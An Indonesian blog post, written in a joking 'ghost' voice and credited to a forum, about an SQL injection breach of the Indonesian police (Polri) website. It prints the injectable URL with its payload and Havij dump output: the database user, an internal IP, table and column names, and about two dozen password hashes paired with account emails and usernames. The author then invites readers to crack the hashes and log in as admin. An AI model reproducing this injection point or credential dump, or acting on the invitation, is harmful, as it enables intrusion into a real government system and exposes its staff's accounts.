Baru-baru ini hantunya gentayangan sana sini, hantunya heran ketika salah seorang pemuda yang ingin mendaftar Polisi melalui situs kebanggan Polri ini. Pemuda tersebut meminta tolong kepada hantunya ( ma'lum hantu baek ) untuk membantu mendaftarkannya melalui situs wewe gombel eh salah, wewewe penerimaanpolri dot go dot id. Setelah mengetukkan alamat situsnya, Hantunya heran seheran herannya, kok situs ini gak ada tampilannya. Apa udah tutup ya penerimaannya? Pertanyaan dalam hati hantunya. Namun setelah hantunya cek tanggal penerimaan, masih ada tuh. Kemudian setelah bermalam-malam ( biasa kalo hantu kan jalannya malam-malam ) hantunya gentayangan lagi dah kesana kemari. Hantunya menemukan sesuatu di halaman web forum teratas di indonesia kalau ternyata web sekelas Polri kena serangan setan jahat dunia maya alias hacker.
Kabarnya, web Polri ini kena serangan SQL Injection yang menurut hantunya tool ini sudah ketinggalan zaman untuk serangan deface kepada web sekelas Polri. Namun ternyata masih ampuh karena masih ada celah pada situs tersebut. Berikut adalah celah halaman situs tersebut.
http://www.polri.go.id/pg/page/polri_moduleViewPolling.req.php?height=350&width=400&ip=2%27[/spoiler
=
Wah rawan bener ni Polisi Indonesia. Servernya gimana sih, kok bisa ada lubang besar pada situs resminya.
Nah Setelah di cari databasenya ternyata berhasil dan menemukan database seperti dibawah ini dengan menggunakan HAVIJ
(+) Informations:
(+) User : mbahdepan@192.168.10.199
(+) Database : podb
(+) Version : 5.0.77
(+) Other DB : information_schema
(+) Tables from podb:
01_nad,02_sumut
03_riau,04_kepri
05_sumbar
06_bengkulu
08_sumsel
09_lampung
10_metro
11_jabar
12_jateng
13_diy
14_jatim
15_bali
16_ntb
17_ntt
18_kalbar
19_kalsel
20_kalteng
21_kaltim
22_sulsel
23_sultra
24_sulteng
25_sulut
26_maluku
27_papua
28_babel
29_banten
30_gorontalo
31_malut
_pol_banner_Goid
_pol_buku_tamu_Goid
_pol_contact_Goid
_pol_counter_Goid
_pol_data_Goid
_pol_doh_Goid
_pol_dpo_Goid
_pol_event_Goid
_pol_highlight_Goid
_pol_kantor_Goid
_pol_kantor_satker_Goid
_pol_kantor_subsatker_Goid
_pol_kapolda_Goid
_pol_kapolri_Goid
_pol_kasus_Goid
_pol_laporan_pengaduan_Goid
_pol_laporan_pengaduan_identitas_Goid
_pol_laporan_pengaduan_type_Goid
_pol_link_Goid
_pol_link_internal_Goid
_pol_mailing_list_Goid
_pol_map_master_goid
_pol_map_region_goid
_pol_news_Goid
_pol_news_category_Goid
_pol_organisasi_Goid
_pol_polling_Goid
_pol_social_network_Goid
_pol_str_polda
_pol_str_polda_desc
_pol_str_polda_isi
_pol_struktur_org_Goid
_pol_user_Goid
_pol_video_Goid
(+) Columns _pol_user_Goid:
id_user
username
nama
password
email
id_kantor
id_satker
id_subsatker
role
id_filter
Trus percobaan dilanjutkan ke user name dan paswordnya yang masih di enskripsi seperti dibawah ini.
ad776552a38491d636f7651ee07cc1ef admin@polri.go.id 0p5_ntb
b9713801dc6796defa4f8f5b57f3712e info@polri.go.id 1twasda_polda_ntb
c2b2030d2906ef9baa3899046b49d9d6 info@polri.go.id 53tum_ntb
9dd71dffc076283a1b72ff6a92a4e05d info@polri.go.id 5pn_polda
e38f77956ac1f287a3a30e7d51a8c391 info@polri.go.id adminmulmed
bdc697aafadf91f71f76f1e17bf369da info@polri.go.id annisa
de17704ae819493c2e0116160db9445e info@polri.go.id b1dkum
1273fa9bfa227caf63586c03c8ab831e info@polri.go.id b1dku_polda
243eed5bb9300c759c5f4f28878f5de4 info@polri.go.id b1n@mitr@
e952bc6a728541d28e9426478c227822 info@polri.go.id balikpapan
a49abf2977ce9680e6ac875bbdd88815 info@polri.go.id berau
4de67bf1274d2cdd5c06bb349c02f2d8 info@polri.go.id bidku
dec737701f9d9326d4c57a03517ae146 info@polri.go.id bidkum
924bc8f66a42e7b407bcb00e7b8bb630 info@polri.go.id bidtel
46bb4cfce578b08788dc3db814910268 info@polri.go.id bidtel_polda_sumut
952f762da8c9b5705b4274220e57a774 info@polri.go.id bid_dokkes_polda_jabar
dd29348037a82d27ed31a70d13fe3adb info@polri.go.id bid_humas
e59abeeca549c219522fb32d3fc9fccd info@polri.go.id bid_humas_polda_jabar
b3e632cd79e77b97307cf214ae93bb7f info@polri.go.id bid_kum_polda_jabar
d4a055e6339bc372cd5930fb0042bb7d info@polri.go.id bid_ku_polda_jabar
71a8ca66f03751deac655eb737f091c8 telbkl@polri.go.id bid_propam_polda_jabar
9dd71dffc076283a1b72ff6a92a4e05d info@polri.go.id bid_telematika
1b44f6b00577b1cff45148f9870e8c9d info@polri.go.id bid_telematika_polda_j
Nah Hantunya ingin bertanya kepada kamu apabila kamu seorang Hacker, walau pemula sekalipun. apa yang bisa kamu lakukan kalau melihat tampilan diatas. Wiihh.....makanan sehat bukan. Tinggal cari halaman login adminnya trus crack passwordnya, terserah kamu lah mau ngapain. Begitu mudahnya untuk web sekelas Polri.
Sampai saat tulisan ini diterbitkan oleh hantunya tampilan website Polri masih blank. Berikut tampilannya.
 |
| klik untuk memperbesar gambar | |
|
|
Beginikah nasib web kebanggaan Polri ini? Dari web inikah masuknya para pemimpin-pemimpin POLRI????
Sungguh miris dan ironis?
Okelah kalauw begitu...hanya begitu aja. Sukur-sukur yang hack adalah warga negara RI kalau orang asing mah, jadi apa tu website Polri.
Kepada Admin dan para pengurus Website Polri. Agar sama sama kita berbenarh diri untuk menutupi kekurangan pada diri kita. Jangan mulai dari yang kecil, mulailah dari yang paling besar kare yang kecil bisa dihilangkan.
Sumber : kaskus.us
